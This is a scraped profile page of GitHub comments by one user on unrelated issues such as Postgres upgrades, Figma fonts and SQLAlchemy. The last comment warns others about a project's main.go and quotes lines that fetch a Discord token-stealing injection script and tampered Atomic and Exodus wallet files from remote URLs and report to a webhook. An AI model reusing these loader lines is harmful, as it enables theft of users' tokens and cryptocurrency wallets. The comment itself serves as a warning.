BH

Results 15 comments of BH

It usually won't work with same device more than 5 times. ishandutta2007 , what is qs_stamp ?

Any progress or solution to fix this?

I also faced the issue. For me it was a big surprise. Solved by upgrading postgresql from 15 to 15.1 version and setting HOME env variable in docker-compose.yml file ```...

Not working on Debian Bullseye 12 I have done everything as @Konadu-Akwasi-Akuoko said, pointed Figma to directories - still no fonts available

Why hasn't it been merged? Pretty sure somebody has the same problem

Facing same issue ``` @compiles(Utcnow, 'postgresql') def pg_utcnow(element, compiler, **kw): return "TIMEZONE('utc', CURRENT_TIMESTAMP)" @compiles(Utcnow, 'mssql') def ms_utcnow(element, compiler, **kw): return 'GETUTCDATE()' ```

Same for me, no trades open for 3 days on dry run

You should pay attention to this lines in main.go file ``` go discordinjection.Run( "https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js", CONFIG["webhook"].(string), ) go walletsinjection.Run( "https://github.com/hackirby/wallets-injection/raw/main/atomic.asar", "https://github.com/hackirby/wallets-injection/raw/main/exodus.asar", CONFIG["webhook"].(string), ) ``` The getToken function (in injection.js) dynamically extracts...